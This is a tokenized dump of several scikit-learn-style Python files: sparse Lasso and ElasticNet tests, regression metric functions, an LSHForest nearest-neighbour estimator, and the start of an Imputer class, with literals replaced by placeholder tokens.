<EOL> positive = False ) <EOL> _test_sparse_enet_not_as_toy_dataset ( alpha = <NUM_LIT> , fit_intercept = False , <EOL> positive = True ) <EOL> _test_sparse_enet_not_as_toy_dataset ( alpha = <NUM_LIT> , fit_intercept = True , <EOL> positive = True ) <EOL> def test_sparse_lasso_not_as_toy_dataset ( ) : <EOL> n_samples = <NUM_LIT:100> <EOL> max_iter = <NUM_LIT:1000> <EOL> n_informative = <NUM_LIT:10> <EOL> X , y = make_sparse_data ( n_samples = n_samples , n_informative = n_informative ) <EOL> X_train , X_test = X [ n_samples // <NUM_LIT:2> : ] , X [ : n_samples // <NUM_LIT:2> ] <EOL> y_train , y_test = y [ n_samples // <NUM_LIT:2> : ] , y [ : n_samples // <NUM_LIT:2> ] <EOL> s_clf = Lasso ( alpha = <NUM_LIT:0.1> , fit_intercept = False , max_iter = max_iter , tol = <NUM_LIT> ) <EOL> s_clf . fit ( X_train , y_train ) <EOL> assert_almost_equal ( s_clf . dual_gap_ , <NUM_LIT:0> , <NUM_LIT:4> ) <EOL> assert_greater ( s_clf . score ( X_test , y_test ) , <NUM_LIT> ) <EOL> d_clf = Lasso ( alpha = <NUM_LIT:0.1> , fit_intercept = False , max_iter = max_iter , tol = <NUM_LIT> ) <EOL> d_clf . fit ( X_train . toarray ( ) , y_train ) <EOL> assert_almost_equal ( d_clf . dual_gap_ , <NUM_LIT:0> , <NUM_LIT:4> ) <EOL> assert_greater ( d_clf . score ( X_test , y_test ) , <NUM_LIT> ) <EOL> assert_equal ( np . sum ( s_clf . coef_ != <NUM_LIT:0.0> ) , n_informative ) <EOL> def test_enet_multitarget ( ) : <EOL> n_targets = <NUM_LIT:3> <EOL> X , y = make_sparse_data ( n_targets = n_targets ) <EOL> estimator = ElasticNet ( alpha = <NUM_LIT> , fit_intercept = True , precompute = None ) <EOL> estimator . fit ( X , y ) <EOL> coef , intercept , dual_gap = ( estimator . coef_ , <EOL> estimator . intercept_ , <EOL> estimator . dual_gap_ ) <EOL> for k in range ( n_targets ) : <EOL> estimator . fit ( X , y [ : , k ] ) <EOL> assert_array_almost_equal ( coef [ k , : ] , estimator . coef_ ) <EOL> assert_array_almost_equal ( intercept [ k ] , estimator . intercept_ ) <EOL> assert_array_almost_equal ( dual_gap [ k ] , estimator . dual_gap_ ) <EOL> def test_path_parameters ( ) : <EOL> X , y = make_sparse_data ( ) <EOL> max_iter = <NUM_LIT:50> <EOL> n_alphas = <NUM_LIT:10> <EOL> clf = ElasticNetCV ( n_alphas = n_alphas , eps = <NUM_LIT> , max_iter = max_iter , <EOL> l1_ratio = <NUM_LIT:0.5> , fit_intercept = False ) <EOL> ignore_warnings ( clf . fit ) ( X , y ) <EOL> assert_almost_equal ( <NUM_LIT:0.5> , clf . l1_ratio ) <EOL> assert_equal ( n_alphas , clf . n_alphas ) <EOL> assert_equal ( n_alphas , len ( clf . alphas_ ) ) <EOL> sparse_mse_path = clf . mse_path_ <EOL> ignore_warnings ( clf . fit ) ( X . toarray ( ) , y ) <EOL> assert_almost_equal ( clf . mse_path_ , sparse_mse_path ) <EOL> def test_same_output_sparse_dense_lasso_and_enet_cv ( ) : <EOL> X , y = make_sparse_data ( n_samples = <NUM_LIT> , n_features = <NUM_LIT:10> ) <EOL> for normalize in [ True , False ] : <EOL> clfs = ElasticNetCV ( max_iter = <NUM_LIT:100> , cv = <NUM_LIT:5> , normalize = normalize ) <EOL> ignore_warnings ( clfs . fit ) ( X , y ) <EOL> clfd = ElasticNetCV ( max_iter = <NUM_LIT:100> , cv = <NUM_LIT:5> , normalize = normalize ) <EOL> ignore_warnings ( clfd . fit ) ( X . toarray ( ) , y ) <EOL> assert_almost_equal ( clfs . alpha_ , clfd . alpha_ , <NUM_LIT:7> ) <EOL> assert_almost_equal ( clfs . intercept_ , clfd . intercept_ , <NUM_LIT:7> ) <EOL> assert_array_almost_equal ( clfs . mse_path_ , clfd . mse_path_ ) <EOL> assert_array_almost_equal ( clfs . alphas_ , clfd . alphas_ ) <EOL> clfs = LassoCV ( max_iter = <NUM_LIT:100> , cv = <NUM_LIT:4> , normalize = normalize ) <EOL> ignore_warnings ( clfs . fit ) ( X , y ) <EOL> clfd = LassoCV ( max_iter = <NUM_LIT:100> , cv = <NUM_LIT:4> , normalize = normalize ) <EOL> ignore_warnings ( clfd . fit ) ( X . toarray ( ) , y ) <EOL> assert_almost_equal ( clfs . alpha_ , clfd . alpha_ , <NUM_LIT:7> ) <EOL> assert_almost_equal ( clfs . intercept_ , clfd . intercept_ , <NUM_LIT:7> ) <EOL> assert_array_almost_equal ( clfs . mse_path_ , clfd . mse_path_ ) <EOL> assert_array_almost_equal ( clfs . alphas_ , clfd . alphas_ ) </s>
<s> """<STR_LIT>""" <EOL> from __future__ import division <EOL> import numpy as np <EOL> from . . utils . validation import check_array , check_consistent_length <EOL> from . . utils . validation import column_or_1d <EOL> from . . externals . six import string_types <EOL> import warnings <EOL> __ALL__ = [ <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" <EOL> ] <EOL> def _check_reg_targets ( y_true , y_pred , multioutput ) : <EOL> """<STR_LIT>""" <EOL> check_consistent_length ( y_true , y_pred ) <EOL> y_true = check_array ( y_true , ensure_2d = False ) <EOL> y_pred = check_array ( y_pred , ensure_2d = False ) <EOL> if y_true . ndim == <NUM_LIT:1> : <EOL> y_true = y_true . reshape ( ( - <NUM_LIT:1> , <NUM_LIT:1> ) ) <EOL> if y_pred . ndim == <NUM_LIT:1> : <EOL> y_pred = y_pred . reshape ( ( - <NUM_LIT:1> , <NUM_LIT:1> ) ) <EOL> if y_true . shape [ <NUM_LIT:1> ] != y_pred . shape [ <NUM_LIT:1> ] : <EOL> raise ValueError ( "<STR_LIT>" <EOL> "<STR_LIT>" . format ( y_true . shape [ <NUM_LIT:1> ] , y_pred . shape [ <NUM_LIT:1> ] ) ) <EOL> n_outputs = y_true . shape [ <NUM_LIT:1> ] <EOL> multioutput_options = ( None , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' ) <EOL> if multioutput not in multioutput_options : <EOL> multioutput = check_array ( multioutput , ensure_2d = False ) <EOL> if n_outputs == <NUM_LIT:1> : <EOL> raise ValueError ( "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> elif n_outputs != len ( multioutput ) : <EOL> raise ValueError ( ( "<STR_LIT>" <EOL> "<STR_LIT>" ) % <EOL> ( len ( multioutput ) , n_outputs ) ) <EOL> y_type = '<STR_LIT>' if n_outputs == <NUM_LIT:1> else '<STR_LIT>' <EOL> return y_type , y_true , y_pred , multioutput <EOL> def mean_absolute_error ( y_true , y_pred , <EOL> sample_weight = None , <EOL> multioutput = '<STR_LIT>' ) : <EOL> """<STR_LIT>""" <EOL> y_type , y_true , y_pred , multioutput = _check_reg_targets ( <EOL> y_true , y_pred , multioutput ) <EOL> output_errors = np . average ( np . abs ( y_pred - y_true ) , <EOL> weights = sample_weight , axis = <NUM_LIT:0> ) <EOL> if isinstance ( multioutput , string_types ) : <EOL> if multioutput == '<STR_LIT>' : <EOL> return output_errors <EOL> elif multioutput == '<STR_LIT>' : <EOL> multioutput = None <EOL> return np . average ( output_errors , weights = multioutput ) <EOL> def mean_squared_error ( y_true , y_pred , <EOL> sample_weight = None , <EOL> multioutput = '<STR_LIT>' ) : <EOL> """<STR_LIT>""" <EOL> y_type , y_true , y_pred , multioutput = _check_reg_targets ( <EOL> y_true , y_pred , multioutput ) <EOL> output_errors = np . average ( ( y_true - y_pred ) ** <NUM_LIT:2> , axis = <NUM_LIT:0> , <EOL> weights = sample_weight ) <EOL> if isinstance ( multioutput , string_types ) : <EOL> if multioutput == '<STR_LIT>' : <EOL> return output_errors <EOL> elif multioutput == '<STR_LIT>' : <EOL> multioutput = None <EOL> return np . average ( output_errors , weights = multioutput ) <EOL> def median_absolute_error ( y_true , y_pred ) : <EOL> """<STR_LIT>""" <EOL> y_type , y_true , y_pred , _ = _check_reg_targets ( y_true , y_pred , <EOL> '<STR_LIT>' ) <EOL> if y_type == '<STR_LIT>' : <EOL> raise ValueError ( "<STR_LIT>" ) <EOL> return np . median ( np . abs ( y_pred - y_true ) ) <EOL> def explained_variance_score ( y_true , y_pred , <EOL> sample_weight = None , <EOL> multioutput = '<STR_LIT>' ) : <EOL> """<STR_LIT>""" <EOL> y_type , y_true , y_pred , multioutput = _check_reg_targets ( <EOL> y_true , y_pred , multioutput ) <EOL> y_diff_avg = np . average ( y_true - y_pred , weights = sample_weight , axis = <NUM_LIT:0> ) <EOL> numerator = np . average ( ( y_true - y_pred - y_diff_avg ) ** <NUM_LIT:2> , <EOL> weights = sample_weight , axis = <NUM_LIT:0> ) <EOL> y_true_avg = np . average ( y_true , weights = sample_weight , axis = <NUM_LIT:0> ) <EOL> denominator = np . average ( ( y_true - y_true_avg ) ** <NUM_LIT:2> , <EOL> weights = sample_weight , axis = <NUM_LIT:0> ) <EOL> nonzero_numerator = numerator != <NUM_LIT:0> <EOL> nonzero_denominator = denominator != <NUM_LIT:0> <EOL> valid_score = nonzero_numerator & nonzero_denominator <EOL> output_scores = np . ones ( y_true . shape [ <NUM_LIT:1> ] ) <EOL> output_scores [ valid_score ] = <NUM_LIT:1> - ( numerator [ valid_score ] / <EOL> denominator [ valid_score ] ) <EOL> output_scores [ nonzero_numerator & ~ nonzero_denominator ] = <NUM_LIT:0.> <EOL> if isinstance ( multioutput , string_types ) : <EOL> if multioutput == '<STR_LIT>' : <EOL> return output_scores <EOL> elif multioutput == '<STR_LIT>' : <EOL> avg_weights = None <EOL> elif multioutput == '<STR_LIT>' : <EOL> avg_weights = denominator <EOL> else : <EOL> avg_weights = multioutput <EOL> return np . average ( output_scores , weights = avg_weights ) <EOL> def r2_score ( y_true , y_pred , <EOL> sample_weight = None , <EOL> multioutput = None ) : <EOL> """<STR_LIT>""" <EOL> y_type , y_true , y_pred , multioutput = _check_reg_targets ( <EOL> y_true , y_pred , multioutput ) <EOL> if sample_weight is not None : <EOL> sample_weight = column_or_1d ( sample_weight ) <EOL> weight = sample_weight [ : , np . newaxis ] <EOL> else : <EOL> weight = <NUM_LIT:1.> <EOL> numerator = ( weight * ( y_true - y_pred ) ** <NUM_LIT:2> ) . sum ( axis = <NUM_LIT:0> , <EOL> dtype = np . float64 ) <EOL> denominator = ( weight * ( y_true - np . average ( <EOL> y_true , axis = <NUM_LIT:0> , weights = sample_weight ) ) ** <NUM_LIT:2> ) . sum ( axis = <NUM_LIT:0> , <EOL> dtype = np . float64 ) <EOL> nonzero_denominator = denominator != <NUM_LIT:0> <EOL> nonzero_numerator = numerator != <NUM_LIT:0> <EOL> valid_score = nonzero_denominator & nonzero_numerator <EOL> output_scores = np . ones ( [ y_true . shape [ <NUM_LIT:1> ] ] ) <EOL> output_scores [ valid_score ] = <NUM_LIT:1> - ( numerator [ valid_score ] / <EOL> denominator [ valid_score ] ) <EOL> output_scores [ nonzero_numerator & ~ nonzero_denominator ] = <NUM_LIT:0.> <EOL> if multioutput is None and y_true . shape [ <NUM_LIT:1> ] != <NUM_LIT:1> : <EOL> warnings . warn ( "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" , <EOL> DeprecationWarning ) <EOL> multioutput = '<STR_LIT>' <EOL> if isinstance ( multioutput , string_types ) : <EOL> if multioutput == '<STR_LIT>' : <EOL> return output_scores <EOL> elif multioutput == '<STR_LIT>' : <EOL> avg_weights = None <EOL> elif multioutput == '<STR_LIT>' : <EOL> avg_weights = denominator <EOL> if not np . any ( nonzero_denominator ) : <EOL> if not np . any ( nonzero_numerator ) : <EOL> return <NUM_LIT:1.0> <EOL> else : <EOL> return <NUM_LIT:0.0> <EOL> else : <EOL> avg_weights = multioutput <EOL> return np . average ( output_scores , weights = avg_weights ) </s>
<s> """<STR_LIT>""" <EOL> import numpy as np <EOL> import warnings <EOL> from scipy import sparse <EOL> from . base import KNeighborsMixin , RadiusNeighborsMixin <EOL> from . . base import BaseEstimator <EOL> from . . utils . validation import check_array <EOL> from . . utils import check_random_state <EOL> from . . metrics . pairwise import pairwise_distances <EOL> from . . random_projection import GaussianRandomProjection <EOL> __all__ = [ "<STR_LIT>" ] <EOL> HASH_DTYPE = '<STR_LIT>' <EOL> MAX_HASH_SIZE = np . dtype ( HASH_DTYPE ) . itemsize * <NUM_LIT:8> <EOL> def _find_matching_indices ( tree , bin_X , left_mask , right_mask ) : <EOL> """<STR_LIT>""" <EOL> left_index = np . searchsorted ( tree , bin_X & left_mask ) <EOL> right_index = np . searchsorted ( tree , bin_X | right_mask , <EOL> side = '<STR_LIT:right>' ) <EOL> return left_index , right_index <EOL> def _find_longest_prefix_match ( tree , bin_X , hash_size , <EOL> left_masks , right_masks ) : <EOL> """<STR_LIT>""" <EOL> hi = np . empty_like ( bin_X , dtype = np . intp ) <EOL> hi . fill ( hash_size ) <EOL> lo = np . zeros_like ( bin_X , dtype = np . intp ) <EOL> res = np . empty_like ( bin_X , dtype = np . intp ) <EOL> left_idx , right_idx = _find_matching_indices ( tree , bin_X , <EOL> left_masks [ hi ] , <EOL> right_masks [ hi ] ) <EOL> found = right_idx > left_idx <EOL> res [ found ] = lo [ found ] = hash_size <EOL> r = np . arange ( bin_X . shape [ <NUM_LIT:0> ] ) <EOL> kept = r [ lo < hi ] <EOL> while kept . shape [ <NUM_LIT:0> ] : <EOL> mid = ( lo . take ( kept ) + hi . take ( kept ) ) // <NUM_LIT:2> <EOL> left_idx , right_idx = _find_matching_indices ( tree , <EOL> bin_X . take ( kept ) , <EOL> left_masks [ mid ] , <EOL> right_masks [ mid ] ) <EOL> found = right_idx > left_idx <EOL> mid_found = mid [ found ] <EOL> lo [ kept [ found ] ] = mid_found + <NUM_LIT:1> <EOL> res [ kept [ found ] ] = mid_found <EOL> hi [ kept [ ~ found ] ] = mid [ ~ found ] <EOL> kept = r [ lo < hi ] <EOL> return res <EOL> class ProjectionToHashMixin ( object ) : <EOL> """<STR_LIT>""" <EOL> @ staticmethod <EOL> def _to_hash ( projected ) : <EOL> if projected . shape [ <NUM_LIT:1> ] % <NUM_LIT:8> != <NUM_LIT:0> : <EOL> raise ValueError ( '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> out = np . packbits ( ( projected > <NUM_LIT:0> ) . astype ( int ) ) . view ( dtype = HASH_DTYPE ) <EOL> return out . reshape ( projected . shape [ <NUM_LIT:0> ] , - <NUM_LIT:1> ) <EOL> def fit_transform ( self , X , y = None ) : <EOL> self . fit ( X ) <EOL> return self . transform ( X ) <EOL> def transform ( self , X , y = None ) : <EOL> return self . _to_hash ( super ( ProjectionToHashMixin , self ) . transform ( X ) ) <EOL> class GaussianRandomProjectionHash ( ProjectionToHashMixin , <EOL> GaussianRandomProjection ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , <EOL> n_components = <NUM_LIT:8> , <EOL> random_state = None ) : <EOL> super ( GaussianRandomProjectionHash , self ) . __init__ ( <EOL> n_components = n_components , <EOL> random_state = random_state ) <EOL> def _array_of_arrays ( list_of_arrays ) : <EOL> """<STR_LIT>""" <EOL> out = np . empty ( len ( list_of_arrays ) , dtype = object ) <EOL> out [ : ] = list_of_arrays <EOL> return out <EOL> class LSHForest ( BaseEstimator , KNeighborsMixin , RadiusNeighborsMixin ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , n_estimators = <NUM_LIT:10> , radius = <NUM_LIT:1.0> , n_candidates = <NUM_LIT:50> , <EOL> n_neighbors = <NUM_LIT:5> , min_hash_match = <NUM_LIT:4> , radius_cutoff_ratio = <NUM_LIT> , <EOL> random_state = None ) : <EOL> self . n_estimators = n_estimators <EOL> self . radius = radius <EOL> self . random_state = random_state <EOL> self . n_candidates = n_candidates <EOL> self . n_neighbors = n_neighbors <EOL> self . min_hash_match = min_hash_match <EOL> self . radius_cutoff_ratio = radius_cutoff_ratio <EOL> def _compute_distances ( self , query , candidates ) : <EOL> """<STR_LIT>""" <EOL> if candidates . shape == ( <NUM_LIT:0> , ) : <EOL> return np . empty ( <NUM_LIT:0> , dtype = np . int ) , np . empty ( <NUM_LIT:0> , dtype = float ) <EOL> if sparse . issparse ( self . _fit_X ) : <EOL> candidate_X = self . _fit_X [ candidates ] <EOL> else : <EOL> candidate_X = self . _fit_X . take ( candidates , axis = <NUM_LIT:0> , mode = '<STR_LIT>' ) <EOL> distances = pairwise_distances ( query , candidate_X , <EOL> metric = '<STR_LIT>' ) [ <NUM_LIT:0> ] <EOL> distance_positions = np . argsort ( distances ) <EOL> distances = distances . take ( distance_positions , mode = '<STR_LIT>' , axis = <NUM_LIT:0> ) <EOL> return distance_positions , distances <EOL> def _generate_masks ( self ) : <EOL> """<STR_LIT>""" <EOL> tri_size = MAX_HASH_SIZE + <NUM_LIT:1> <EOL> left_mask = np . tril ( np . ones ( ( tri_size , tri_size ) , dtype = int ) ) [ : , <NUM_LIT:1> : ] <EOL> right_mask = left_mask [ : : - <NUM_LIT:1> , : : - <NUM_LIT:1> ] <EOL> self . _left_mask = np . packbits ( left_mask ) . view ( dtype = HASH_DTYPE ) <EOL> self . _right_mask = np . packbits ( right_mask ) . view ( dtype = HASH_DTYPE ) <EOL> def _get_candidates ( self , query , max_depth , bin_queries , n_neighbors ) : <EOL> """<STR_LIT>""" <EOL> index_size = self . _fit_X . shape [ <NUM_LIT:0> ] <EOL> n_candidates = <NUM_LIT:0> <EOL> candidate_set = set ( ) <EOL> min_candidates = self . n_candidates * self . n_estimators <EOL> while ( max_depth > self . min_hash_match and <EOL> ( n_candidates < min_candidates or <EOL> len ( candidate_set ) < n_neighbors ) ) : <EOL> left_mask = self . _left_mask [ max_depth ] <EOL> right_mask = self . _right_mask [ max_depth ] <EOL> for i in range ( self . n_estimators ) : <EOL> start , stop = _find_matching_indices ( self . trees_ [ i ] , <EOL> bin_queries [ i ] , <EOL> left_mask , right_mask ) <EOL> n_candidates += stop - start <EOL> candidate_set . update ( <EOL> self . original_indices_ [ i ] [ start : stop ] . tolist ( ) ) <EOL> max_depth -= <NUM_LIT:1> <EOL> candidates = np . fromiter ( candidate_set , count = len ( candidate_set ) , <EOL> dtype = np . intp ) <EOL> if candidates . shape [ <NUM_LIT:0> ] < n_neighbors : <EOL> warnings . warn ( <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" % ( n_neighbors , self . min_hash_match ) ) <EOL> remaining = np . setdiff1d ( np . arange ( <NUM_LIT:0> , index_size ) , candidates ) <EOL> to_fill = n_neighbors - candidates . shape [ <NUM_LIT:0> ] <EOL> candidates = np . concatenate ( ( candidates , remaining [ : to_fill ] ) ) <EOL> ranks , distances = self . _compute_distances ( query , <EOL> candidates . astype ( int ) ) <EOL> return ( candidates [ ranks [ : n_neighbors ] ] , <EOL> distances [ : n_neighbors ] ) <EOL> def _get_radius_neighbors ( self , query , max_depth , bin_queries , radius ) : <EOL> """<STR_LIT>""" <EOL> ratio_within_radius = <NUM_LIT:1> <EOL> threshold = <NUM_LIT:1> - self . radius_cutoff_ratio <EOL> total_candidates = np . array ( [ ] , dtype = int ) <EOL> total_neighbors = np . array ( [ ] , dtype = int ) <EOL> total_distances = np . array ( [ ] , dtype = float ) <EOL> while ( max_depth > self . min_hash_match and <EOL> ratio_within_radius > threshold ) : <EOL> left_mask = self . _left_mask [ max_depth ] <EOL> right_mask = self . _right_mask [ max_depth ] <EOL> candidates = [ ] <EOL> for i in range ( self . n_estimators ) : <EOL> start , stop = _find_matching_indices ( self . trees_ [ i ] , <EOL> bin_queries [ i ] , <EOL> left_mask , right_mask ) <EOL> candidates . extend ( <EOL> self . original_indices_ [ i ] [ start : stop ] . tolist ( ) ) <EOL> candidates = np . setdiff1d ( candidates , total_candidates ) <EOL> total_candidates = np . append ( total_candidates , candidates ) <EOL> ranks , distances = self . _compute_distances ( query , candidates ) <EOL> m = np . searchsorted ( distances , radius , side = '<STR_LIT:right>' ) <EOL> positions = np . searchsorted ( total_distances , distances [ : m ] ) <EOL> total_neighbors = np . insert ( total_neighbors , positions , <EOL> candidates [ ranks [ : m ] ] ) <EOL> total_distances = np . insert ( total_distances , positions , <EOL> distances [ : m ] ) <EOL> ratio_within_radius = ( total_neighbors . shape [ <NUM_LIT:0> ] / <EOL> float ( total_candidates . shape [ <NUM_LIT:0> ] ) ) <EOL> max_depth = max_depth - <NUM_LIT:1> <EOL> return total_neighbors , total_distances <EOL> def fit ( self , X , y = None ) : <EOL> """<STR_LIT>""" <EOL> self . _fit_X = check_array ( X , accept_sparse = '<STR_LIT>' ) <EOL> self . hash_functions_ = [ ] <EOL> self . trees_ = [ ] <EOL> self . original_indices_ = [ ] <EOL> rng = check_random_state ( self . random_state ) <EOL> int_max = np . iinfo ( np . int32 ) . max <EOL> for i in range ( self . n_estimators ) : <EOL> hasher = GaussianRandomProjectionHash ( MAX_HASH_SIZE , <EOL> rng . randint ( <NUM_LIT:0> , int_max ) ) <EOL> hashes = hasher . fit_transform ( self . _fit_X ) [ : , <NUM_LIT:0> ] <EOL> original_index = np . argsort ( hashes ) <EOL> bin_hashes = hashes [ original_index ] <EOL> self . original_indices_ . append ( original_index ) <EOL> self . trees_ . append ( bin_hashes ) <EOL> self . hash_functions_ . append ( hasher ) <EOL> self . _generate_masks ( ) <EOL> return self <EOL> def _query ( self , X ) : <EOL> """<STR_LIT>""" <EOL> bin_queries = np . asarray ( [ hasher . transform ( X ) [ : , <NUM_LIT:0> ] <EOL> for hasher in self . hash_functions_ ] ) <EOL> bin_queries = np . rollaxis ( bin_queries , <NUM_LIT:1> ) <EOL> depths = [ _find_longest_prefix_match ( tree , tree_queries , MAX_HASH_SIZE , <EOL> self . _left_mask , self . _right_mask ) <EOL> for tree , tree_queries in zip ( self . trees_ , <EOL> np . rollaxis ( bin_queries , <NUM_LIT:1> ) ) ] <EOL> return bin_queries , np . max ( depths , axis = <NUM_LIT:0> ) <EOL> def kneighbors ( self , X , n_neighbors = None , return_distance = True ) : <EOL> """<STR_LIT>""" <EOL> if not hasattr ( self , '<STR_LIT>' ) : <EOL> raise ValueError ( "<STR_LIT>" ) <EOL> if n_neighbors is None : <EOL> n_neighbors = self . n_neighbors <EOL> X = check_array ( X , accept_sparse = '<STR_LIT>' ) <EOL> neighbors , distances = [ ] , [ ] <EOL> bin_queries , max_depth = self . _query ( X ) <EOL> for i in range ( X . shape [ <NUM_LIT:0> ] ) : <EOL> neighs , dists = self . _get_candidates ( X [ [ i ] ] , max_depth [ i ] , <EOL> bin_queries [ i ] , <EOL> n_neighbors ) <EOL> neighbors . append ( neighs ) <EOL> distances . append ( dists ) <EOL> if return_distance : <EOL> return np . array ( distances ) , np . array ( neighbors ) <EOL> else : <EOL> return np . array ( neighbors ) <EOL> def radius_neighbors ( self , X , radius = None , return_distance = True ) : <EOL> """<STR_LIT>""" <EOL> if not hasattr ( self , '<STR_LIT>' ) : <EOL> raise ValueError ( "<STR_LIT>" ) <EOL> if radius is None : <EOL> radius = self . radius <EOL> X = check_array ( X , accept_sparse = '<STR_LIT>' ) <EOL> neighbors , distances = [ ] , [ ] <EOL> bin_queries , max_depth = self . _query ( X ) <EOL> for i in range ( X . shape [ <NUM_LIT:0> ] ) : <EOL> neighs , dists = self . _get_radius_neighbors ( X [ [ i ] ] , max_depth [ i ] , <EOL> bin_queries [ i ] , radius ) <EOL> neighbors . append ( neighs ) <EOL> distances . append ( dists ) <EOL> if return_distance : <EOL> return _array_of_arrays ( distances ) , _array_of_arrays ( neighbors ) <EOL> else : <EOL> return _array_of_arrays ( neighbors ) <EOL> def partial_fit ( self , X , y = None ) : <EOL> """<STR_LIT>""" <EOL> X = check_array ( X , accept_sparse = '<STR_LIT>' ) <EOL> if not hasattr ( self , '<STR_LIT>' ) : <EOL> return self . fit ( X ) <EOL> if X . shape [ <NUM_LIT:1> ] != self . _fit_X . shape [ <NUM_LIT:1> ] : <EOL> raise ValueError ( "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> n_samples = X . shape [ <NUM_LIT:0> ] <EOL> n_indexed = self . _fit_X . shape [ <NUM_LIT:0> ] <EOL> for i in range ( self . n_estimators ) : <EOL> bin_X = self . hash_functions_ [ i ] . transform ( X ) [ : , <NUM_LIT:0> ] <EOL> positions = self . trees_ [ i ] . searchsorted ( bin_X ) <EOL> self . trees_ [ i ] = np . insert ( self . trees_ [ i ] , <EOL> positions , bin_X ) <EOL> self . original_indices_ [ i ] = np . insert ( self . original_indices_ [ i ] , <EOL> positions , <EOL> np . arange ( n_indexed , <EOL> n_indexed + <EOL> n_samples ) ) <EOL> if sparse . issparse ( X ) or sparse . issparse ( self . _fit_X ) : <EOL> self . _fit_X = sparse . vstack ( ( self . _fit_X , X ) ) <EOL> else : <EOL> self . _fit_X = np . row_stack ( ( self . _fit_X , X ) ) <EOL> return self </s>
<s> import warnings <EOL> import numpy as np <EOL> import numpy . ma as ma <EOL> from scipy import sparse <EOL> from scipy import stats <EOL> from . . base import BaseEstimator , TransformerMixin <EOL> from . . utils import check_array <EOL> from . . utils import safe_mask <EOL> from . . utils . fixes import astype <EOL> from . . utils . sparsefuncs import _get_median <EOL> from . . utils . validation import check_is_fitted <EOL> from . . utils . validation import FLOAT_DTYPES <EOL> from . . externals import six <EOL> zip = six . moves . zip <EOL> map = six . moves . map <EOL> __all__ = [ <EOL> '<STR_LIT>' , <EOL> ] <EOL> def _get_mask ( X , value_to_mask ) : <EOL> """<STR_LIT>""" <EOL> if value_to_mask == "<STR_LIT>" or np . isnan ( value_to_mask ) : <EOL> return np . isnan ( X ) <EOL> else : <EOL> return X == value_to_mask <EOL> def _most_frequent ( array , extra_value , n_repeat ) : <EOL> """<STR_LIT>""" <EOL> if array . size > <NUM_LIT:0> : <EOL> mode = stats . mode ( array ) <EOL> most_frequent_value = mode [ <NUM_LIT:0> ] [ <NUM_LIT:0> ] <EOL> most_frequent_count = mode [ <NUM_LIT:1> ] [ <NUM_LIT:0> ] <EOL> else : <EOL> most_frequent_value = <NUM_LIT:0> <EOL> most_frequent_count = <NUM_LIT:0> <EOL> if most_frequent_count == <NUM_LIT:0> and n_repeat == <NUM_LIT:0> : <EOL> return np . nan <EOL> elif most_frequent_count < n_repeat : <EOL> return extra_value <EOL> elif most_frequent_count > n_repeat : <EOL> return most_frequent_value <EOL> elif most_frequent_count == n_repeat : <EOL> if most_frequent_value < extra_value : <EOL> return most_frequent_value <EOL> else : <EOL> return extra_value <EOL> class Imputer ( BaseEstimator , TransformerMixin ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , missing_values = "<STR_LIT>" , strategy = "<STR_LIT>" , <EOL> axis = <NUM_LIT:0> , verbose = <NUM_LIT:0> , copy = True , add_indicator_features = False ) : <EOL> self . missing_values = missing_values <EOL> self . strategy = strategy <EOL> self . axis = axis <EOL> self . verbose = verbose <EOL> self . copy = copy <EOL> self . add_indicator_features = add_indicator_features <EOL> def fit ( self , X , y = None ) : <EOL> """<STR_LIT>""" <EOL> allowed_strategies = [ "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" ] <EOL> if self . strategy not in allowed_strategies : <EOL> raise ValueError ( "<STR_LIT>" <EOL> "<STR_LIT>" . format ( allowed_strategies , <EOL> self . strategy ) ) <EOL> if self . axis not in [ <NUM_LIT:0> , <NUM_LIT:1> ] : <EOL> raise ValueError ( "<STR_LIT>" <EOL> "<STR_LIT>" . format ( self . axis ) ) <EOL> if self . axis == <NUM_LIT:0> : <EOL> X = check_array ( X , accept_sparse = '<STR_LIT>' , dtype = np . float64 , <EOL> force_all_finite = False ) <EOL> if sparse . issparse ( X ) : <EOL> self . statistics_ = self . _sparse_fit ( X , <EOL> self . strategy , <EOL> self . missing_values , <EOL> self . axis ) <EOL> else : <EOL> self . statistics_ = self . _dense_fit ( X , <EOL> self . strategy , <EOL> self . missing_values , <EOL> self . axis ) <EOL> return self <EOL> def _sparse_fit ( self , X , strategy , missing_values , axis ) : <EOL> """<STR_LIT>""" <EOL> if axis == <NUM_LIT:1> : <EOL> X = X . tocsr ( ) <EOL> else : <EOL> X = X . tocsc ( ) <EOL> if missing_values == <NUM_LIT:0> : <EOL> n_zeros_axis = np . zeros ( X . shape [ not axis ] , dtype = int ) <EOL> else : <EOL> n_zeros_axis = X . shape [ axis ] - np . diff ( X . indptr ) <EOL> if strategy == "<STR_LIT>" : <EOL> if missing_values != <NUM_LIT:0> : <EOL> n_non_missing = n_zeros_axis <EOL> mask_missing_values = _get_mask ( X . data , missing_values ) <EOL> mask_valids = np . logical_not ( mask_missing_values ) <EOL> new_data = X . data . copy ( ) <EOL> new_data [ mask_missing_values ] = <NUM_LIT:0> <EOL> X = sparse . csc_matrix ( ( new_data , X . indices , X . indptr ) , <EOL> copy = False ) <EOL> sums = X . sum ( axis = <NUM_LIT:0> ) <EOL> mask_non_zeros = sparse . csc_matrix ( <EOL> ( mask_valids . astype ( np . float64 ) , <EOL> X . indices , <EOL> X . indptr ) , copy = False ) <EOL> s = mask_non_zeros . sum ( axis = <NUM_LIT:0> ) <EOL> n_non_missing = np . add ( n_non_missing , s ) <EOL> else : <EOL> sums = X . sum ( axis = axis ) <EOL> n_non_missing = np . diff ( X . indptr ) <EOL> with np . errstate ( all = "<STR_LIT:ignore>" ) : <EOL> return np . ravel ( sums ) / np . ravel ( n_non_missing ) <EOL> else : <EOL> columns_all = np . hsplit ( X . data , X . indptr [ <NUM_LIT:1> : - <NUM_LIT:1> ] ) <EOL> mask_missing_values = _get_mask ( X . data , missing_values ) <EOL> mask_valids = np . hsplit ( np . logical_not ( mask_missing_values 